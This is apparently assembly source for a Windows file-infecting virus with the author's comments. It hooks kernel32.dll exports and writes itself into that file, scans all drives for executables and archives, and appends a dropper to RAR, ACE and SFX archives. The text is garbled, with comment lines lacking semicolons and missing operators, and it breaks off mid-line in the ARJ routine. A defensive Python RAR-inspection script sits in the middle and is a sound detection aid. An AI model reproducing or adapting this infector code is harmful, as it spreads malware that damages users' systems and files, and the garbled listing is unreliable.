; Function to hook some functions from kernel32.dll
; -------------------------------------------------------------
; At last I've finished this unpalatable function. I remem-
; ber how hard it was to find an interesting source about
; this method, because I had many many problems with it.
; So, let's begin. At first I will get these addresses:
;  * name table pointer (where the function names are)
;  * address table pointer (where the function addresses are)
;  * ordinal table pointer
; Imate name, calculate its CRC32 and I'll
; compare it with my future-hooked CRC32 table. If I
; find it, I will save its original address, replace it by
; my new offset and I'll write it to the file.
;
; I would like to thank:
;  * "Memory Lapse" for his "Win32.Heretic" source
;  * Darkman/29A for giving me that source
;
; I must infect "kernel32.dll" because I must hook all disk
; functions because of "Prizzy Hyper Infection for API".
;
Infect_file_kernel:
; Save All Registers
Pusha
Check Address of Apis in kernel32 File Body
Mov Eax, [EBP File_HMEM]
Add eax, [eax.mz_lfanew]; Go to New "PE" Header
MOV Eax, DWORD PTR [Eax.OH_DirectoryEntries /
Image_sizeof_file_header /
00000004h]; Get Export Directory Table
Add Eax, [EBP File_HMEM]
MOV EBX, [Eax.ed_addressofordinals]
Mov esi, [eax.ed_addressofnames]]
MOV EDX, [EAX.ED_ADDRESSOFFUNCTIONS]
PUSH [EAX.ED_BASEORDINAL]; save base ordinal
Add eax, [eax.ed_baseordinal]
Add EBX, [EBP File_HMEM]; Adjust Ordinal Table Pointer
Add ESI, [EBP File_HMEM]; Adjust Name Table Pointer
Add Edx, [EBP File_HMEM]; Adjust Address Table Pointer
Push Edx ESI EBX; Save Startup Values
Main Loop
Lea EDI, [EBP HOOKED_API]
MOV ECX, 00000001H
__IFK_NEXT_LOOP:
Push Edx; Address Table Pointer
Push Ecx; Save Counter
SHL ECX, 01H; Convert to Word INDEX
Movzx Eax, Word PTR [EBX ECX]; Calculate Ordinal Index
Sub Eax, [ESP 00000014H]; Relative to Ordinal Basee
SHL EAX, 02H; Convert to DWORD INDEX
Mov Edx, EAX
MOV ECX, [ESP 00000010h]; Address Pointer Table
Add Eax, Ecx; Calculate Offset
LEA ECX, [ECX EDX]; RVA of API
Push ESI; Address Name Table
MOV ESI, [ESI]; Get Pointer from name TABLE
Add ESI, [EBP File_HMEM]
Call __get_crc32; get crc32 for function name
CMP Eax, [EDI]; Compare CRC32
POP ESI
JNZ __IFK_NOT_FOND
Push EDI; Load Original Function Addr
Lea Eax, [EBP HOOKED_API]
Sub EDI, EAX
SHL EDI, 01H; SO, (X / 2) * 8
Lea Eax, [EBP HOOKED_API_FUNCTION]
Add Edi, EAX
MOV EAX, [EDI]; Get Address INTO "JMP ????"
Add Eax, EBP; EHM, Adjust That Address
MOV EBX, [ECX]; Load Original Address
Add EBX, [EBP KERNEL_BASE]
MOV [EAX], EBX; Save Original Func. Address
MOV Eax, [EDI 00000004h]; Load New Address in v.body
POP EDI
Add EDI, 00000004H; Next CRC32 Function Value
Sub eax, offset virus_start; - "offset"
Add Eax, [EBP DTA.DTA_FILESIZE]; New Func. Pos in "K32"
MOV [ECX], EAX
For Next Loop I Must Restart There Values
MOV EBX, [ESP 00000008H]; Load Ordinal Table Pointer
MOV ESI, [ESP+0000000CH]; load name table pointer
MOV EDX, [ESP+00000010H]; load address table pointer
Mov DWORD PTR [ESP], 00000000H; Reset Counter
MOV [ESP 00000004H], EDX; Reset Address Table Pointer
JMP __IFK_NO_CHANGE; this Was Fucking Bug!
__IFK_NOT_FOND:
Add ESI, 00000004h; Next Name Pointer
ADD DWORD PTR [ESP+00000004H], 00000004H; next function pointer
__IFK_NO_CHANGE:
POP ECX; Functions Counter
Inc ECX; Next Function
POP EDX; Address Table Pointer
CMP DWORD PTR [EDI], 00000000H; End Of HOOKED FUNCTIONS?
JNZ __IFK_NEXT_LOOP
MOV DWORD PTR [EBP IT_IS_KERNEL], 00000000H
MOV DWORD PTR [EBP HYPERINFECTION_K32], 00000000H
Write this Virus body to the end of "kernel32.dll"
Virus body cannot be encrypted ...
Lea ESI, [EBP VIRUS_START]; Start of Virus Body
MOV EDI, [EBP MEM_ADDRESS]; Allocated Memory
MOV ECX, MEM_SIZE
REP MOVSB
MOV DWORD PTR [EBP IT_IS_KERNEL], 00000001H
MOV EAX, MEM_SIZE; WITHOUT POLY-ENGINE !!!
MOV [EBP POLY_FINISH], EAX
Add ESP, 4 * 4
POPA
Ret; Complex Way How To Go Back
; -------------------------------------------------------------
; Mother function to infect all filez on disks
; -------------------------------------------------------------
; This function searches these extensions on all disks:
;   EXE, ZIP, ARJ, RAR, ACE, CAB, ...
; and many namez; find the "Hypertable" struct for more info.
; If you want to know more about this method, open the "Hyper
; Infection" article in 29A #4, or download one from my web.
;
; Note: this is the version for API; for IDT orientation use
; the code from "Win95.Prizzy", thanks.
;
Init_Search:
Pusha
Call get_base_ebp; Where we're Into EBP
MOV EBX, [EBP Search_Table]; Position in Hypertable
CMP BYTE PTR [EBP Search_Start], 00H
JNZ __CONTINUE
MOV BYTE PTR [EBP Search_Start], 01H
Call get_disks; get drive parameters
Lea EAX, [EBP TIME]
Push EAX
Call [EBP DDGETSYSTEMTIME]; GET ACTUAL TIME
MOV EAX, Search_Mem_Size; Size of Mem for Searching
Call malloc
JZ Init_Search_ERROR; WERE WE SUCESSFUL?
MOV [EBP SEARCH_ADDRESS], EAX
MOV EAX, 005C3A43H; 'C: // 0'
MOV DWORD PTR [EBP Search_FileName], EAX
__searching:
MOV BYTE PTR [EBP Search_plunge], 00H
JMP Search_all_DIRS
__searching_end:
CMP BYTE PTR [EBP Search_FileName], 'Z'
JZ Init_Search_done
Inc Byte PTR [EBP Search_FileName]
MOV Word PTR [EBP Search_FileName 2], 005CH
What Disk is it? fixed? CD-ROM? RAM-DISK? ETC.?
MOV CL, 'A'
SUB CL, [EBP Search_FileName]
NEG CL
MOV EAX, 00000001H
SHL Eax, Cl; Convert to BCD
TEST [EBP GDT_FLAGS], EAX
JNZ __SEARCHING; May i "use" this disk?
JMP __Searching_end; uaaaaah, I'm crazy ... :)
INIT_SEARCH_EXIT:
MOV ECX, DWORD PTR [EBP Search_Address]
Call Mdealloc; DEAllocate Memory
INIT_SEARCH_ERROR:
POPA; RESTORE All REGZ
RET
INIT_SEARCH_DONE:; ALL Disks Infected?
Call hookhyperinfection_done; remove timer
JMP init_Search_exit
Search_all_dirs:
Lea EBX, [EBP HYPERTABLE]
Search_all_dirs_continue:
Call __add_filename; add filename or extension
Call __calc_in_mem; Offs DTA in Mem to ESI
Lea Edx, [EBP Search_FileName]
Call __myfindfirst
MOV [ESI-SIZE Search_Handle], Eax; Save Handle
JC __FIND_DIR; Error?
__repeat:
Call __clean; delete extension
PUSH ESI
Lea ESI, [ESI] .dta_filename; and add file name
@copysz; Copy with Zero Char
POP ESI; Restore ESI = DTA IN MEMORY
Lea Eax, [EBP SEARCH_FILENAME]
MOV [EBP FileName_ptr], EAX
__final_softice_1: NOP
NOP
; int 4; Final Softice Breakpoint
MOV EAX, [EBX-00000004H]; Input Value
Push DWORD PTR [EBX-00000008H]
Add [ESP], EBP; This Was Ghastly Bug!
Call [ESP]; CALL FUNCTION
POP EAX
Push Word PTR [EBP TIME.WSECOND]
Lea Eax, [EBP TIME]; GIVE TIME OTHER APPZ
Push EAX
Call [EBP DDGETSYSTEMTIME]
POP CX
MOV [EBP Search_Table], EBX; Position in Hypertable
CMP CX, [EBP TIME.WSECOND]; OUT OF TIME?
JNZ Init_Search_ERROR
__continue:
Call __calc_in_mem; ESI = DTA IN MEMORY
MOV Eax, [ESI-size Search_Handle]; Handle of Findfirstfile
Call __myfindnext
JNC __Repeat
Call __myfindclose
__find_dir:
Call __clean; remove file name / extension
CMP BYTE PTR [EBX], 0FFH; Last File Name?
JNZ Search_all_dirs_continue
__find_dir_continue:
MOV [EDI], 002A2E2AH; Add '*. *', 0
Call __calc_in_mem
Lea Edx, [EBP Search_FileName]
Call __myfindfirst; Search Directory "ONLY"
MOV [ESI-size Search_Handle], EAX
JC __Search_exit
__find_in_dir:
TEST [ESI] .dta_fileattr, 10h; Is IT Directory?
JZ __FIND_NEXT
CMP [ESI] .dta_filename, '.'; IT CAN't Be Directory
JZ __FIND_NEXT
Inc Byte PTR [EBP Search_Plunge]
Call __get_last_char; edi = last char of filename
LEA ESI, [ESI] .dta_filename; ESI = filename
Call __clean; remove extension
@COPysz; Copy Directory Name and
Mov Word PTR [EDI-1], 005CH; SET '/' AT THE END
JMP Search_all_dirs; Search in New Directory
__find_next:
Call __calc_in_mem
MOV EAX, [ESI-size Search_Handle]
Call __myfindnext
JNC __find_in_dir
__search_exit:
Call __clean; remove file name and '/'
MOV BYTE PTR [EDI-1], 00h; It's Out of Directory
Dec byte PTR [EBP Search_Plunge]
CMP BYTE PTR [EBP+Search_FileName+2], 00H
JZ __SEARCHING_END
JMP __find_next
__calc_in_mem:; Get Pointer to DTA IN MEMORY
Movzx ESI, BYTE PTR [EBP Search_plunge]
Imul ESI, SIZE DTA SIZE Search_Handle
Add ESI, [EBP Search_Address]
Add ESI, SIZE Search_Handle
RET
__add_filename:; add f.n. or ney by hypertable
Call __get_last_char
CMP BYTE PTR [EBX], 00H; ONLY EXTENSION?
JNZ __AF_FULLLCOPY
MOV EAX, [EBX 1]; load extension
MOV BYTE PTR [EDI], 2AH; '*'
MOV [EDI 1], EX; and Extension
MOV BYTE PTR [EDI 5], 00H; ZERO BYTE
Add ebx, Hypertable_Ondesize
CMP Byte Ptr [EBX - /
Hypertable_halfsize], 00H; Search this extension?
JZ __AFF_FINISH
POP EAX
JMP __FIND_DIR
__AFF_FINISH:
RET
__af_fullcopy:
Inc EBX
Mov Al, Byte PTR [EBX]; Load FileName's Char
MOV [EDI], Al
Inc EDI
OR Al, Al; End Of FileName?
JNZ __AF_FULLLCOPY
Add Ebx, Hypertable_HalfSize 1; 1 Means ZERO BYTE
CMP Byte Ptr [EBX - /
Hypertable_halfsize], 00H; Search this filename?
JZ __AFF_FINISH
POP EAX
JMP __FIND_DIR
__GET_LAST_CHAR:; EDI = Last Char 1 in FileName
Lea Edi, [EBP Search_FileName]
Mov ECX, FileName_Size
XOR Al, Al
CLD
RepNZ scaSB
Dec Edi
RET
__clean:; Clean Last Item in FileName
Lea Edx, [EBP Search_FileName]
Call __get_last_char
__2: MOV BYTE PTR [EDI], 0
Dec Edi
CMP Byte PTR [EDI], '/'
JNZ __2
Inc EDI
RET
; -------------------------------------------------------------
; Infection of ACE/RAR and ACE/RAR EXE-SFX archivez
; -------------------------------------------------------------
; This function scans the input EXE file to see whether it is an SFX
; for RAR (DOS, W32) or for ACE (DOS, Win32 - German/English).
; If yes, I will put the compressed dropper at the end of the file.
; Why that? See the "INFECT_ACE:" comment for more info.
__ISFX_FHANDLE  DD 00000000H            ; file's handle
__ISFX_FMEMORY  DD 00000000H            ; file's headers
__ISFX_NCOMPARE DD 00000000H            ; comparing places
;
Infect_ace_rar:
; Open INPUT FILE
MOV EDX, [EBP FileName_ptr]
Call __myopenfile
JC __ISFX_FINISH
MOV [EBP __ISFX_FHANDLE], EAX
Allocate Memory for Comparing
Mov Eax, 10000H
Call malloc
MOV [EBP __ISFX_FMEMORY], EAX
WE Must Search Certain Bytes on Certain File Position
MOV [EBP __ISFX_NCompare], 7; Six! Comparing
__isfx_search_1:
Dec [EBP __ isfx_ncompare]
JZ __ISFX_SEND
Lea EBX, [EBP Archive_magicwhere]
__ISFX_MAGIC_OKAY:
MOV EAX, [EBP __ isfx_ncompare]
Imul Eax, 00000004H
Add Ebx, EAX
Movzx ECX, Word PTR [EBX-0002H]; ECX = bytes to Read
Movzx ESI, Word PTR [EBX-0004H]; ESI = File POS
Now, I Will Read DataS
MOV EDX, [EBP __ isfx_fmemory]; Allocated Place
MOV EBX, [EBP __ isfx_fhandle]
Call __myreadfile; i can't check error!
Prepare TO SCAN
MOV EDI, [EBP __ isfx_fmemory]
MOV EBX, EDI
Add EBX, ECX; End of Memory Buffer
__isfx_search_2:
CMP EDI, EBX
JA __ISFX_Search_1
; Search Archive's Signatures
LEA ESI, [EBP RAR_MAGIC]; No, ESI = RAR_MAGIC
MOV ECX, RAR_MAGIC_LENGTH; and ITS SIZE
CMP [EBP __ISFX_NCompare], 00000004H
JAE __ISFX_S2_CONTINUE; Is IT Really Rar?
Lea ESI, [EBP ACE_MAGIC]; ESI = ACE_MAGIC
MOV ECX, ACE_MAGIC_LENGTH; and ITS Size
__ISFX_S2_CONTINUE:
CLD
REPE CMPSB; compare magics
JNZ __ISFX_Search_2; Shit, WE Must Search On Other Place
Position on Header's Start
SUB EDI, RAR_MAGIC_LENGTH
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_h_read
SUB EDI, 2 * ACE_MAGIC_LENGTH-RAR_MAGIC_LENGTH
__isfx_h_read:
; Check multivolume flag
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_mf_rar
Test Word PTR [EDI ACEHHEADFLAGS-ACE_H_STRUCT], 2048
JMP __ISFX_MF_FINISH
__isfx_mf_rar:
Test Word PTR [EDI RARFILEFLAGS-RARSIGNATURE], 0001H
__ISFX_MF_FINISH:
JNZ __ISFX_SEND
; Call "child" function, set certain input parameters
MOV EAX, [EBP __ISFX_FHANDLE]
MOV [EBP __IACR_FHANDLE], EAX ; Modify handle
MOV [EBP __IACR_TYPE], __IACR_TRAR ; Yeah, RAR archive
CMP [EBP __ISFX_NCompare], 00000004H
Jae __isfx_cc_finish
MOV [EBP __IACR_TYPE], __IACR_TACE ; Yeah, ACE archive
__ISFX_CC_FINISH:
MOV EBX, [EBP __ISFX_FHANDLE] ; Check whether SFX
Call __get_archive_infected; archive has been
JC __Isfx_fclose; infected
Call __iacr_child_function; Call Main Function
JMP __ISFX_FINISH; TO INFECT ACE or RAR
__isfx_send:
Call __isfx_fclose
STC
RET
__isfx_fclose:
MOV EBX, [EBP __ISFX_FHANDLE]
Call __myclosefile
__isfx_finish:
CLC
RET
; ACE and RAR archivez
; -------------------------------------------------------------
; This function infects ACE and RAR archivez. Unfortunately
; I can't place my dropper inside the archive, 'cause if the archive
; is of solid type the resulting archive won't be okay. Yes, this was
; a shock for me. But if the archive isn't solid all will be okay,
; although this method is not supported here. So, my dropper
; is compressed but at the end of the file.
;
; Input: filename_ptr ... Pointer to an Arj's FileName
;        NEWARJ STRUC ... has been filled? I don't know!
;
; Output: Nothing
;
__iacr_fhandle dd 00000000h; Archive's Handle
__iacr_dhandle dd 00000000h; Dropper's Handle
__iacr_dmemory dd 00000000H; Dropper's Body
;
__iacr_type DD 00000000H ; Ace or Rar?
__IACR_TACE EQU 00H ; ACE signature
__iacr_trar EQU 01H; Rar Signature
;
Infect_ace: MOV [EBP __IACR_TYPE], __IACR_TACE ; Yeah, ACE archive
JMP infect_acr
Infect_rar: MOV [EBP __IACR_TYPE], __IACR_TRAR ; Yeah, RAR archive
; Here the common function starts ...
Infect_acr:
; Check whether dropper exists
MOV EAX, [EBP __IACR_TYPE] ; Get archive type
Imul Eax, Size Aprogram
CMP [EBP EAX NEWACE.DROPPER], 00000000h
JZ __IACR_FINISH; Does Dropper EXISTS?
; Open Archive File
MOV EDX, [EBP FileName_ptr]
Call __myopenfile
JC __IACR_FINISH
MOV [EBP __IACR_FHANDLE], EAX
; Check whether archive has been infected
MOV EBX, [EBP __IACR_FHANDLE]
Call __get_archive_infected
JC __IACR_FCLOSE
; Read archive header
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __IACR_TACE
JNZ __IACR_RAR_1
Lea Edx, [EBP ACE_H_STRUCT]; Destination Place
MOV ECX, Aceneededbytes
JMP __IACR_END_1
__iacr_rar_1:
LEA EDX, [EBP RARSIGNATURE]; Destination Place
MOV ECX, RARSIGNATURE_LENGTH+RARNEEDEDBYTES ; Number of bytes to read
__iacr_end_1:
XOR ESI, ESI
MOV EBX, [EBP __IACR_FHANDLE]
Call __myreadfile
JC __IACR_FCLOSE
; Check archive's header
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __IACR_TACE
JNZ __IACR_RAR_2
CMP DWORD PTR [EBP ACEHSIGNATURE], 'CA**'
JNZ __IACR_FCLOSE ; The 1st part of sign
CMP Word PTR [EBP ACEHSIGNATURE+0004H], '*E'
JNZ __IACR_FCLOSE; The 2nd Part
Test Word PTR [EBP ACEHHEADFLAGS], 2048
JNZ __IACR_FCLOSE; MULTIVOLUME FLAG?
JMP __IACR_END_2
__iacr_rar_2:
CMP DWORD PTR [EBP RARSIGNATURE], '!raR'
JNZ __IACR_FCLOSE
CMP Word PTR [EBP RARSIGNATURE+0004H], 071AH
JNZ __IACR_FCLOSE
TEST WORD PTR [EBP RARFILEFLAGS], 0001H
JNZ __IACR_FCLOSE ; Multivolume flag?
__iacr_end_2:
; Open dropper file
__IACR_CHILD_FUNCTION:
MOV EDX, [EBP __IACR_TYPE] ; Get archive type
Imul EDX, SIZE APROGRAM
MOV EDX, [EBP EDX NEWACE.DROPPER]
OR EDX, EDX; ONCE AGAIN TEST:
JZ __IACR_FINISH; Does Dropper EXISTS?
Call __myopenfile
JC __IACR_FCLOSE
MOV [EBP __IACR_DHANDLE], EAX
; Get dropper's file size
Mov EBX, [EBP __IACR_DHANDLE]
Call __mygetfilesize
MOV ECX, EAX
; Allocate Memory For Dropper's File Body
Call malloc
MOV [EBP __IACR_DMEMORY], EAX
; Read whole dropper's body
MOV EDX, [EBP __IACR_DMEMORY] ; Destination buffer
XOR ESI, ESI ; File position
MOV EBX, [EBP __IACR_DHANDLE] ; Dropper's handle
Call __myreadfile
JC __IACR_DCLOSE
; Get archive file size
MOV EBX, [EBP __IACR_FHANDLE]
Call __mygetfilesize
Mov ESI, EAX
; "Update" archive file by my dropper
CMP DWORD PTR [EBP OFFSET __IACR_TYPE], __IACR_TACE
JNZ __IACR_RAR_3
Movzx Eax, Word PTR [EDX ACEHHEADSIZE-ACE_H_STRUCT]
Add Eax, 00000004H
JMP __IACR_END_3
__iacr_rar_3:
Movzx Eax, Word PTR [Edx Rarheadersize-Rarsignature]
Add Eax, Rarsignature_Length
__iacr_end_3:
Add Edx, Eax; Header Take Away
Sub ECX, EAX; WITHOUT Main Header, please
MOV EBX, [EBP __IACR_FHANDLE]
Call __mywritefile ; write my dropper, uaaah :)
; Archive has been infected
MOV EBX, [EBP __IACR_FHANDLE]
Call __set_archive_infected
__iacr_dclose:
Mov EBX, [EBP __IACR_DHANDLE]
Call __myclosefile
__iacr_dealloc:
MOV EAX, [EBP __IACR_DMEMORY]
Call Mdealloc
__iacr_fclose:
MOV EBX, [EBP __IACR_FHANDLE]
Call __myclosefile
__iacr_finish:
RET
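A defender-side check for the RAR case handled by the two routines above (the SFX scan and the archive infector), added here as an example and not part of the original listing: it walks the RAR 2.x block chain from the 'Rar!' 1A 07 signature the code compares, reads the multi-volume flag the code tests, and lists file entries, flagging entries that appear after the end-of-archive block, executable names, and bytes owned by no block; it also finds the signature behind an SFX stub. The block layout (7-byte header, 4-byte ADD_SIZE when flag 8000h is set, name at offset 32 of a file header) and the constructed sample archives are my assumptions; CRC fields are not verified.

```python
import struct
# RAR 2.x marker: the 'Rar!' dword and 1A07h word the listing above compares.
RAR_SIGNATURE = b"Rar!\x1a\x07\x00"
MAIN_HEAD, FILE_HEAD, END_HEAD = 0x73, 0x74, 0x7B
MHD_VOLUME = 0x0001   # multi-volume flag in the main header (the infector skips these)
LONG_BLOCK = 0x8000   # block carries a 4-byte ADD_SIZE (packed data follows header)
EXE_SUFFIXES = (".exe", ".com", ".scr", ".pif", ".bat")
def walk_rar(data: bytes) -> dict:
    """Walk a RAR 2.x block chain (also behind an SFX stub) and report anomalies."""
    start = data.find(RAR_SIGNATURE)            # SFX EXE: archive sits after the stub
    if start < 0:
        raise ValueError("no RAR 2.x signature found")
    pos = start + len(RAR_SIGNATURE)
    info = {"entries": [], "warnings": [], "multivolume": False, "trailing": 0}
    seen_end = False
    while pos + 7 <= len(data):
        _crc, htype, flags, hsize = struct.unpack_from("<HBHH", data, pos)
        if hsize < 7:                           # a zero-size block would loop forever
            info["warnings"].append(f"corrupt block header at offset {pos}")
            break
        add_size = 0
        if flags & LONG_BLOCK and pos + 11 <= len(data):
            add_size = struct.unpack_from("<I", data, pos + 7)[0]
        if htype == MAIN_HEAD:
            info["multivolume"] = bool(flags & MHD_VOLUME)
        elif htype == FILE_HEAD and hsize >= 32:
            name_size = struct.unpack_from("<H", data, pos + 26)[0]
            name = data[pos + 32:pos + 32 + name_size].decode("latin-1")
            info["entries"].append(name)
            if seen_end:                        # a clean archive ends at its ENDARC
                info["warnings"].append(f"file block after end-of-archive: {name}")
            if name.lower().endswith(EXE_SUFFIXES):
                info["warnings"].append(f"executable entry: {name}")
        elif htype == END_HEAD:
            seen_end = True
        pos += hsize + add_size                 # next block header
    info["trailing"] = max(0, len(data) - pos)  # bytes owned by no block
    return info
# Constructed sample blocks, not real archives: CRC fields are simply zero.
def main_block(flags=0): return struct.pack("<HBHHHI", 0, MAIN_HEAD, flags, 13, 0, 0)
def end_block(): return struct.pack("<HBHH", 0, END_HEAD, 0, 7)
def file_block(name, payload):                  # stored (method 30h), v2.0 header
    n = name.encode("latin-1")
    hdr = struct.pack("<HBHHIIBIIBBHI", 0, FILE_HEAD, LONG_BLOCK, 32 + len(n),
                      len(payload), len(payload), 0, 0, 0, 20, 0x30, len(n), 0x20)
    return hdr + n + payload
CLEAN = RAR_SIGNATURE + main_block() + file_block("readme.txt", b"hello") + end_block()
# Mimics the listing's append: a dropper archive minus its signature and main header.
INFECTED = CLEAN + file_block("setup.exe", b"MZ-stub") + end_block()
```

Running `walk_rar` over a directory of archives and alerting on any non-empty `warnings` list gives a cheap triage pass for this infection pattern; real-world archives that legitimately lack an ENDARC block will show no "after end-of-archive" warning, so the executable-entry check is the one to rely on there.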
; ARJ archivez
; -------------------------------------------------------------
; This function infects ARJ archivez by my prepared dropper.
; Dropper is compressed by ARJ (Four Method WITHOUT).
;
; Input: filename_ptr ... Pointer to an Arj's FileName
;        NEWARJ STRUC ... has been filled? I don't know!
;
; Output: Nothing
;
__iarj_fhandle dd 00000000h; Archive's Handle
__IARJ_FFILES DD 00000000H; Number of Files
__iarj_dhandle DD 00000000H; Dropper's Handle
__iarj_dmemory DD 00000000H; Dropper's File Body
;
Infect_arj:
XOR EAX, EAX
MOV [EBP __IARJ_FFILES], EAX
; Check whether dropper exists
CMP [EBP NEWARJ.DROPPER], 00000000H
JZ __IARJ_FI